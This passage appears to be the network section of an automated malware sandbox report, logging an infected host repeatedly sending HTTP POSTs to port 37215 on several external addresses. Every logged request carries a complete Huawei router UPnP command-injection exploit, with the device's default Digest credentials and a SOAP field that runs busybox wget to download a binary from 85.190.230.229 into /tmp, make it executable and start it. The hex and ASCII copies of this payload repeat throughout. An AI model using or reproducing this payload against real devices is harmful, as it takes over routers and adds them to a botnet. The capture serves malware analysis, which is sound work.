                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.602102995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      82192.168.2.1450910102.219.43.22137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.709881067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.054104090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.546088934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.537995100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.522103071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.681905985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.617739916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.488976002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999485016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      83192.168.2.146042441.85.249.14337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.976639032 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
